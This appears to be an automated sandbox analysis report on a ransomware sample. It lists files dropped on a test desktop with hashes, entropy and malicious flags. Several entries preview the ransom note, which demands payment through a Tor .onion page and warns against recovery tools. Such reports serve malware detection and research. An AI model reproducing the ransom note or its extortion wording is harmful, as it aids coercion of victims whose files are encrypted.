                                                                                                SHA-512:0957B4112BD972FDBA97A37081F9A54E999F9B3A51988EE44F402D36F3388C9C71C56250C8CE07AACB495D0A42BCD1F027AB4578250C990A0FF70BD2D004C5B8
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\IPKGELNTQY\LSBIHQFDVT.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.862432618334164
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:El9/RpGrIWoS2N8/oyZl5DcqnrZLIsw9sOhqm+pzcCsSmwsLRuQfP0WiJ+1y:ErZkrnolScir+71+lcCsSmZ4yi9
                                                                                                MD5:539C5A7416AA7537AFBF6A405303C0FA
                                                                                                SHA1:315FFEB1E665F68B3812FB97B23676C87DC46B2A
                                                                                                SHA-256:3F106F0DA3C164BE6FD153F98089407536806A97C01656BC463D964BD33EE558
                                                                                                SHA-512:83917A3C81C0E28CF6EBDB42F37546BAAE87DCF2A31FF1B9F4F9BC94377C8A003738219E459C5927F27C28478EAC28977CB54CAFE4A12A9EB4F9E772DA550E40
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\IPKGELNTQY\NEBFQQYWPS.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.859320003275073
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:a26E8Ac7tlr9D64zEXNrlxAEjKJjidrY6/fol3r1T8v/97UZ5WPl:a26ESE4ElzXjKJ6fot98vPd
                                                                                                MD5:9B7CEF646C4F5A2601531373561D2C4F
                                                                                                SHA1:28910220D79572E33DF20FAF7D5CA1E8657C783E
                                                                                                SHA-256:04E62620D0849A0D92AE93E3C1D0F8E2756D9A7003A4FDFA86150A5C1593DC15
                                                                                                SHA-512:8BFCA235BA573FF2F12E75B30430F312399443C6FC7EE4EC1099AB429A6AA522A566A8A00307A3A49B5B21FF695727822EB0A7520EE75B0E3432FF77D8CE89DA
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\IPKGELNTQY\ZQIXMVQGAH.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.848287684839076
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:cFVoOeEKckxZPgoFfTmhupkj9tjuCQd30wpUU+2HT05sPeUwStNTmd:8oOeEp+PgMfChSkZtjuCQ91pnTtPdwSI
                                                                                                MD5:235A69F3CE7C6D3936E8B4BD45DC1D06
                                                                                                SHA1:304CB2335B734B79E3BF9DE075F2055869C62CF0
                                                                                                SHA-256:B52C8964442F2EC05078AA9B9C8005AA693056416604C771940977882CF5CD9D
                                                                                                SHA-512:909279D70D86E84122C266FAD5C46E8514D649C468018C8BA30FBC0E01C1D6092B22439AE05DA0078FDED1308CF3ABA7639BE6E1D4A3280B393320365A7EB173
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\IPKGELNTQY\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8421940155390395
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:4vrJ3Z4qvivxzxM4P/+6W8Mj8e/UFJRbPeMpv85vx5Fp3ILCW4p:yX4qq5xMJz7jV/6LegApd4yp
                                                                                                MD5:2A712F441417CB62D76A15979660705C
                                                                                                SHA1:D21E791688B4D0C46B319E9D1BC14B54ACA61044
                                                                                                SHA-256:D0076F5E1494C2F45ECD2C0F40F3CB645E8A6DE4F3A40CA9CE84092923F5924B
                                                                                                SHA-512:2F819E5AA5F394C1B13AFE9707FFCE4CFF646BB80EFDDF7C1B0C3EEBB9E7528BD3E043BAC0CAAD72E41FA9F31E390B1427974E803B55EFFD80BA13BFCB0BE0A0
                                                                                                Malicious:true
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.870711424465871
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Vm9Xeikw9JtHbri3RWjeHV+6LBQFA4icCEeT+C0UstWLmcsNoba:6DkWJtHbvjeHV3L+F1CEejkBtoba
                                                                                                MD5:0F5F11A2CB0C568395A36D96795F3A2E
                                                                                                SHA1:09E0CB2ACCC0A6269416C4B3A51A56181034B43A
                                                                                                SHA-256:9100A04EFA847AF311A947C7D5EC38866D10DF931873C834046A4DD1BAD48609
                                                                                                SHA-512:559A23ECE486F1C83774478AA5A3197377E0C1F1AC99FECAFFE2793075E2EBF1074D2D8741DA0F66DA0DB33F0AA876D64AC69CBDAB81BBAB8A1AC496C0BAEF71
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT\EFOYFBOLXA.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.842392015528747
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:+x8z7x/F93wo7kC9NIZmpEA+Pjyxv9fPcJBaVnDc3/lfXE:+x8f7VwogO2dW0naVnDc3/5E
                                                                                                MD5:8C3A49C5F8B3DDCD050DD9A2ECACA54D
                                                                                                SHA1:7C9D6F48B8ABA431EB8C1FDA486287EFD7A9B5C7
                                                                                                SHA-256:BFEE284A6244C1B87DCB405BC14420A8751D33CF02D4F55A4DC8B55B0B343112
                                                                                                SHA-512:BE98DE43280145F5009B73EC0568B2F2E4DB1F7A64A4B1968EB2CA5A56ADF0887CF87B13485C10DB77B5690A32DE593057554E1B31FD0EDDEAAF36E61A727AB7
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT\LSBIHQFDVT.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8647976809835605
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:sav/FJ5GA3Vaj5A5skqEJf9bI+N7vfPefqcNLR4nZ6IKl1E8:BTFUjER9ZNxsqZq48
                                                                                                MD5:0BE923158EC33CD02845DC2DAF0D8AB5
                                                                                                SHA1:09F930FFFF139EA27F39002A0899B43938215553
                                                                                                SHA-256:E0B34470AF085FB3FACAD3201A5EFD54408ED228BBDE2046D1861541B658D830
                                                                                                SHA-512:43B503B1C3A8BD76C8F44210B1A34A90426783B5682E10A5441025116998ABD57CF3E868C7479AEA0D0617E3FB2B8C34344709D6C6AA5E95B759FD830806CDDC
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT\QNCYCDFIJJ.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.847389152742023
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:qmnGO3pEunbC5vOLtP21OsqcXB53NI5WpxTGwuVF5UPyadoAGKM9:qmnGOpCxOZyOwR53hyVQDdjM9
                                                                                                MD5:E4A5E5D08DBBE865349BEA320D95515C
                                                                                                SHA1:EE5C7645B73F46A0687AC1562E8C5480E3609D66
                                                                                                SHA-256:7B58A87312B19A5603E2685684F1893C8927D5CCCD21BEF752C266A5C6CD4DC6
                                                                                                SHA-512:61D6E341BFFEDBC04884FADC15887FC0E27D8722970D3089F980FA7181D661B192C46CF8CBA6540CBA93B70F7EF86E0413B1FDB150B21DECED8DCD46C5730A67
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT\SQSJKEBWDT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:COM executable for DOS
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.835729366282277
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:scVXnJPAequAdV53ckcKxN7dK+iQlGOcdINYFieZTFF:scZJIegj5T5p7lcPciTFF
                                                                                                MD5:F4A0704F099C2CCA78311972C65EB744
                                                                                                SHA1:7F822FAEEB79084122D59EE393DEF117EFDC0AA0
                                                                                                SHA-256:7FE53557E06E4CE4D203BC5FEC30811D0093B7C5CA3E5846014F3552FAAE3560
                                                                                                SHA-512:19A03F1211169FA170D7AB50787571E498E0D7F4E8B488C294A500347D46E0A4B0F27B0E9F2AB76B2F1110189C15E2DDEE5CD9188CE79A78548D2A4A565AC922
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT\SUAVTZKNFL.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.864308387399517
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:XGAgIkg8O6xVYy2Wvb+ZUKrjWilO/XPOAAwTkH3ChSk7vv1GS+JFuPgQLb:XGA36920jBiAPAwTkH3wrvABMPgQv
                                                                                                MD5:EB3490E91AFDC76C3F0A36172ACE7C4E
                                                                                                SHA1:D0928A27F4A3B79800F602CBF973BDD5737CD6C1
                                                                                                SHA-256:7C8596C09A200AB5218AA8B0CB87A43386F983AECBA379BE1B2686F776E80C8B
                                                                                                SHA-512:4DF04DD874F944600595AE9F7CDA10D2A3A074C07EC86A9F31B9F4E9058B31075C51E6394BFF38DAAAFC7D84756DBD314E120CC36DDD3D838BADFD8EC7ED7E8A
                                                                                                Malicious:true
                                                                                                C:\Users\user\Desktop\LSBIHQFDVT\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.852045251607469
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:OvtH6BRYmCyBXoMaQP0+eNcxb6ipwgmdCJEGE3rEBr6ii159uKca6i:4YRXXBX6+eoaUg3rEQf7F6i
                                                                                                MD5:1D5589D966D777EE5C96EC9D274DCDDB
                                                                                                SHA1:7F4434F18BCB342273C4F0531C2EC4495682133D
                                                                                                SHA-256:828DE72FE9CF216070E6FC8FC6DB1ED252FDA6D3CFDC6405914054735DC05818
                                                                                                SHA-512:F10BB7A178AF51F2E4A3A7411C51FB6D96F1A69FDCD5BDF1F4F5DCE93FE6A574B17B66DAC40DCD13B567E4CA90A9E98D9091DCB6604C9CB5834DD2DD43DBCA16
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.835601902014908
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:IzbT8SFQpA8IwrSrpOi8COEgZHjZqFYwTqOOxPV3t6MbIilAu66tNlqEy+qU:IrTFQ1I2NtMFedN3t6M0ilZPtNlA+qU
                                                                                                MD5:D55DF30939909713ED2DEDDFFA357899
                                                                                                SHA1:C6841FBBD91E42E331A95FB39B0FDAA65589BCF7
                                                                                                SHA-256:2F3ABD6CD39103DB86B1BC014A5C8D0A1E27F98AE2876FD207F4416058CCD7C4
                                                                                                SHA-512:FCC5FE352A06AC57F7681865E9A307AC216C8F27BA1099D5170E94CBF5E8E60D56A3EB8C5E54EB474F886B8F17D5E46A405F65FC3997ED7878CB8266FB513D2F
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS\NEBFQQYWPS.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.846864475436348
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:XmjfCJfQl2ox7XfxsK+rpJ2hTFfEVKUohC4PUh5tgwdaD2UrM+de/Q92jakY8:5Ql2ox7XfxsKX8bp4PItldaXMpS2jxY8
                                                                                                MD5:5E00D6515D177AC6E75D07C7598FEAD2
                                                                                                SHA1:DBBA30676022E75D4C106FA0D325DDE7EB026C80
                                                                                                SHA-256:7338AD23BC609375E3BD4C9D87D99B0EF98142D11491BE6EEBC2BD37FC01B70A
                                                                                                SHA-512:9C2A78A5381ABD704A688AB446875072C3D0C4B622DEBB2A6A87B9BF6495360EAEF84A54763B79FA727765686FD23FCDEFBDC387B3A0CA987877751A60889145
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS\PIVFAGEAAV.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.827330828949177
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:mZRpEqR8AlPf7MCUH8w/hxH2+9VU0oyFWdwPSCbq4qVtJPDozxC:cRpEq5tfPUHNZd9+s6d34Y7LoNC
                                                                                                MD5:D7ABAE0AB239C4F1EB1219B2C3B1EB39
                                                                                                SHA1:E27A2E555036573AA7C147C52A7F4E63ECAAAE69
                                                                                                SHA-256:E194010311482D37A679DEBCED88BA8F76ECBB3F8EF0EFDBA2D45C44D7A82E81
                                                                                                SHA-512:1923952D5007AF6F59B329C8808D26E19516FA13B7ED917E8F09B3B0975F200A7F4F2A26564B10440DDE036869A418C7795DDCAC910C0DD2CDD05DD74F5C43B1
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS\PWCCAWLGRE.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.864252108899856
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:IIBMej1Ed5QebEvUEcHv3CM0eWx5B4YUI8nLx56e+IzM2T1j1:zX/egvHcUOYL0ASJT1J
                                                                                                MD5:9E6EBEE0DB2AAED39D107791056189D4
                                                                                                SHA1:1DA4E11F3B7F00175D538D7E5B81926459A5E718
                                                                                                SHA-256:6AFFF6182725EB234D3CB86F505F05C72AAEF62D6F94F8DB5C655C2575A4DE9C
                                                                                                SHA-512:677035F101DB2CF79C963680B61BBD832CAC3451E9D9CD364B44283CDBBE31179B7742AE6EA55473E1FF8D6136DED7283D8C1F8C38A121F3672ED9EEBA4D9118
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS\QNCYCDFIJJ.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.841051260600155
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QT3yyIyNryiN37Q1xB3R0+pblyWJCpwo9AwlvxV6SOA/C8KMnNOywm//i:QCyIyNrx1kjBnto2W/DV6SZKMNy
                                                                                                MD5:54777401F8BCCF1492B26A366A1DDB85
                                                                                                SHA1:2C4FCD8C2386B89C44DC2BA2BDDA7F63831935E9
                                                                                                SHA-256:B486A6860513DCCF6C62470334B6AE3FF13B4AACDDAA9B24146404F981A3A1B4
                                                                                                SHA-512:B4DC85E149E6FD4518608D155B85F20F0890E08E71375305BC768D0C7FF83C50509FCA270CEA30841184C35EBD57267639619168230E9A09EBF56DC31A5C12FF
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS\ZQIXMVQGAH.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.870832570390251
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:d1585FS6BYwAbMJPYSKdC2F85BtQCifa52CQzCXdKoXLLR5dK1vkJ:x8DYov0CysQKzQzaJ7OvkJ
                                                                                                MD5:59EDF8FB74ED3150CB745854A75A7118
                                                                                                SHA1:D02CAFE3DC0846A724A6F0C2BA61AD4748542BE0
                                                                                                SHA-256:2D7444DBF54A306019639F8BF83C78631A321F2D8BB5CD0AF57B6343AB63EABB
                                                                                                SHA-512:5CD4E894DF060EE75D416F20F7813333C7F72BF896A8E0614C43F7B0E372B0958F9B4903BAC1E56869E9D521E2FDDF002B9581461C4914CE2E37E1400785849A
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\NEBFQQYWPS\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Desktop\PIVFAGEAAV.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.834415972656961
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:tCrOsyTQzXdst++lkIJi9t046PgPoA7ngzBrk/TgVD2b8k1nTZ1BF60x:tjsyOXdst+JUq0zPgPoMnaBYLgB2Y2lT
                                                                                                MD5:3484322AFD55169086A10C98963E65B5
                                                                                                SHA1:993AD2566BE41442F6D53872BBF3F121FDC0ED8F
                                                                                                SHA-256:C21553F1A8AD14E098D840286A6AC28E5354221C356768862C9EBD0DDB7AFD73
                                                                                                SHA-512:835774A601CD7C22E624C35757570A8F26FB717AB658D8A563245746B608E4716CA39CCAF8F14FA2266C6BE066136A11881673934622F2CDCC208C60FC9A080C
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\PWCCAWLGRE.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8705854174526815
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:DlOH0NauS3P5vBtQnkR5SjtfKAYQWdeBGtdE8nPGkoC/5F:DIu7o5vBVnS5SAYC9oGkoUF
                                                                                                MD5:C1B4967CFA817B7B5B24D40EA231FE00
                                                                                                SHA1:55CA94B4BD1E447B8E33D94A4F260DE2AE5E0FEB
                                                                                                SHA-256:E02174ADF75A5F2C8E83253EC9BDAF71800153E4AA54F1038DF40B7F06D8AF78
                                                                                                SHA-512:EDEB21429D82649711F887FFFA8A6DF30D4AB6A3A99B97C224890ED3A44390258F170D5514395FE32226F167FD270D58B1F0F4572D23052E3909B36C79920BC4
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\PWCCAWLGRE.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.859599967144636
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:alr2HB5rFm2iO1WfibT9N71RYdrAWxKJ7fZA7G+2xpArjj1PZw29rzZ74p:kqh5rBi8WG71OJA0q7fWy+Qmrv1h99vM
                                                                                                MD5:7B8FB60C744A3D87E1D93283184934C1
                                                                                                SHA1:C49D0F700471053B53751F268A9378E7E8CC6EA6
                                                                                                SHA-256:96B24A051D00244A4C250775975F3A2CBC6F2C1F468E407EC6AD36BD23D5A0D2
                                                                                                SHA-512:434D59BD43A2DC67B3C03772F86355BF5EFE4BC1CBDEA908C5A4BE620BE5477E525879FEF4E6BB4F47BD27CA649611928C0BFC1B74A4DF53AB665A8E11DF7EB6
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\QNCYCDFIJJ.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.844867565166824
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:p4PzJOV20EroQcG9JWBx8o+66oDqal0IkPYEmdVVaP6G8JDmwBxzX:pOJWBt+66oDqaSPYnVoSjvBxT
                                                                                                MD5:E337F27E05B52FE9C7B1726416ADA1D6
                                                                                                SHA1:9837CD0CAC2E1D3BFC10D0D561D6652D9AD33DD4
                                                                                                SHA-256:46CC40AE4C09A58DAD8366D4AC29EB545B959FAC72E88438D806AE627A681A3E
                                                                                                SHA-512:49336A60BF82514DCBBE0F9565E31623F92340E03BD9FF8EA0E06029FF5047F5500897267D06A2AFE3866311AFA2768263C3628979C7FE0F410562B9944B3218
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\QNCYCDFIJJ.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.867210826870153
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Z+vL3dzRQl3vz4qGJ5GfK/siF5F0e++HfVOMcrrCDp:Zm3dq5vbGJkfHiN0n+/QMcrWDp
                                                                                                MD5:2E48C41045D9D1258256681D24CDAEC0
                                                                                                SHA1:C502C49022F8D306447CFA093E064B02130C2472
                                                                                                SHA-256:0C6DC035CF9991D2A100FEDD0B39CC4E9B052A356FDB3649AE2A123AD1D68CC6
                                                                                                SHA-512:8D2675400D25D8DA2233B6A9DD500341776A42F0DFEF29C837595E752704FF96CDC6CB01736DF3D4B9E029ADE1E3E77315ECDFB65AC53D99B09D443E4D5253F5
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\SQSJKEBWDT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.839972734745566
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bXW7+NPmLeaB3mctydUMzvRLt6liQnZ8Iv4YRzlZnWJ91c+xC8MbdeFWE6l3P6hh:bXW7+NuKaB3TCjrBt6li3INnnWJ9/T/J
                                                                                                MD5:77258EAE7BA27570E1D90A42197CA1C4
                                                                                                SHA1:F5886D427DB77138AB60A8E7959897AD4B71F251
                                                                                                SHA-256:61EDD4FFFC97587671A115F68F67ECFE29527A3C672A115243BE312B7AB83F13
                                                                                                SHA-512:30304F91FB6879F018E3F065D66975F78ACE5ECA28283936BD437168AC25B8724496A1E07F769290FC952D69D4E17EBB9D48464BF01E72990355A2015064BD4C
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\SQSJKEBWDT.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.852554106138658
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:SYCbZSMw1kQ7g8cXn8r6doxhFTUl4qLk2ywxD8O3VPMeilXYvb881:cbRw1kkgP36/xhFTS4qLk2ye3EXYvb8W
                                                                                                MD5:F4CFEF4A3590849EDFFB74DC7EC664F6
                                                                                                SHA1:60C7EE923133DE7637EC0D72BE38A7E4AE259EFB
                                                                                                SHA-256:6CBC129E13DAF60E8E213F2466F523E69D131DF73A728644ABB0B87E8A4F89BE
                                                                                                SHA-512:FE5406A8A4A679891D33B273211F72B197B15CD884A6DB52F97301EC4FDE8501846E4AD446A153586E95050DEB9BFEBB7069B0CFCD8A2CF4CE31AF9BFDCABFC6
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\SUAVTZKNFL.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.88085398067831
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:WlS+gSnyU+emWNWI/64h+azgiRM3vC5b28ZFMrnpVh/5yv5HLlzPP6JdYqxfm3N:GvnhmWE9qjzgi12AFcpViHWJ6Em3N
                                                                                                MD5:36744C5351598C12F8D2B532897E86E0
                                                                                                SHA1:6C1B18DD6F0F3F00E97D93FD7FE9442488EF8391
                                                                                                SHA-256:5993CEBC15AB86C497BAC2ECB1B947A7F06E6E8474089043F1579FD09865521B
                                                                                                SHA-512:9455BCFEA10D78975F07BED306DEB8BE4047BA2BC70942E8CF40AE287279A11B616F0794626ECBE0378E972B5B1BEE99239239101F731E4942319A7B897428CC
                                                                                                Malicious:false
                                                                                                C:\Users\user\Desktop\ZQIXMVQGAH.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.850086091154252
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MCQR2Qe8BMcj+dd68rbQ033LOtTcR4UyJCdgVICUOVmRjB12scSNk:pQe9O+dbbhLOtAdgKCVmR91tk
                                                                                                MD5:2C1055CA0B1DC8050B3E7483E82CA0BE
                                                                                                SHA1:80AD515E95B68E2E034964E0E36B007FCBE8A51E
                                                                                                SHA-256:885DD2FD4ACB23ED6B07D7EF2F44C65330F28034CCBB74968B1C6560EAA7678B
